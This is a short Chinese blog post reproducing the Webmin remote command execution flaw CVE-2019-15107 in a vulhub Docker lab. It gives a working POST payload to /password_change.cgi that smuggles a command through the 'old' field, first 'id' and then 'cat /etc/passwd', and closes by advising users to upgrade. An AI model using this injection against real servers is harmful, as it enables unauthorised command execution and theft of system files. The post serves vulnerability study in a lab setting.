CVE-2019-15107 Webmin远程命令执行漏洞复现
一、环境搭建
1、下载vulhub源码,下载链接:https://vulhub.org/#/index/
2、靶场虚拟机中安装好docker环境
3、进入到vulhub对应的漏洞目录中,使用命令docker-compose up -d,启动即可
访问https://靶场ip:10000,即可看到webmin登录界面
二、漏洞复现
1、启动浏览器,访问到webmin登录界面
2、访问/password_change.cgi目录
以POST的方式发送POC:user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2,可以看到成功执行id命令
4、将id命令,换成cat /etc/passwd,一样正常执行
该漏洞利用方式简单,成功利用可直接向服务器执行命令,风险极高,使用webmin的用户要注意升级
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步